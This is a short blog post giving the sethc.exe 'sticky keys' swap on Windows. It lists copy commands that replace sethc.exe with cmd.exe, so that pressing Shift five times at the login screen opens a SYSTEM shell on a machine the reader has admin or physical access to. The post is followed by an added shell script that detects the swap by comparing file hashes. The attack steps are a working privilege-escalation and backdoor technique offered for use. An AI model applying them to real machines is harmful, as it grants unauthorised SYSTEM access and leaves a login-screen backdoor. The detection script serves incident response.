This has been documented all over, but I like things to be on the blog so I can find them...
You can gain a SYSTEM shell on an application you have administrative access to, or if you have physical access to the box and can boot to a repair disk or Linux distro and change files.
Make a copy of the original sethc.exe somewhere on the system:
copy c:\windows\system32\sethc.exe c:\
or
cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe
Copy cmd.exe into sethc.exe's place:
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
or
cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe
Reboot, hit the Shift key 5 times, and a SYSTEM shell will pop up. Do your thing.
It would probably be nice to put sethc.exe back when you are done.
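To check a mounted Windows volume for this swap (for example after an engagement, or during incident response), the following added example, which is not part of the original post, compares sethc.exe against cmd.exe by hash. The return codes and the make_sample_volume helper are this example's own conventions, and the sample files it writes are constructed placeholders, not real binaries.

```shell
#!/bin/sh
# Added example: offline check for a sethc.exe -> cmd.exe swap.
# Return codes (this script's convention):
#   0 = sethc.exe differs from cmd.exe
#   1 = sethc.exe is byte-identical to cmd.exe (replaced)
#   2 = expected files not found under the given root

sha() { sha256sum "$1" | cut -d' ' -f1; }

check_sethc() {
    root=$1
    sys32="$root/Windows/System32"
    for f in "$sys32/sethc.exe" "$sys32/cmd.exe"; do
        if [ ! -f "$f" ]; then
            echo "missing: $f" >&2
            return 2
        fi
    done
    if [ "$(sha "$sys32/sethc.exe")" = "$(sha "$sys32/cmd.exe")" ]; then
        echo "REPLACED: $sys32/sethc.exe is identical to cmd.exe"
        # The steps above park the original at the volume root;
        # report it so it can be verified and restored.
        if [ -f "$root/sethc.exe" ]; then
            echo "candidate original: $root/sethc.exe sha256=$(sha "$root/sethc.exe")"
        fi
        return 1
    fi
    echo "ok: sethc.exe differs from cmd.exe"
    return 0
}

# Hypothetical helper: builds a constructed directory tree with placeholder
# files so the check can be exercised without a real Windows volume.
make_sample_volume() {
    dir=$(mktemp -d)
    mkdir -p "$dir/Windows/System32"
    printf 'constructed cmd placeholder' > "$dir/Windows/System32/cmd.exe"
    printf 'constructed sethc placeholder' > "$dir/Windows/System32/sethc.exe"
    echo "$dir"
}

# Usage: sh check_sethc.sh /mnt/sda3
if [ $# -gt 0 ]; then
    check_sethc "$1"
    exit $?
fi
```

A match only shows that the two files are identical; verify any candidate original against a known-good copy for that Windows build before restoring it.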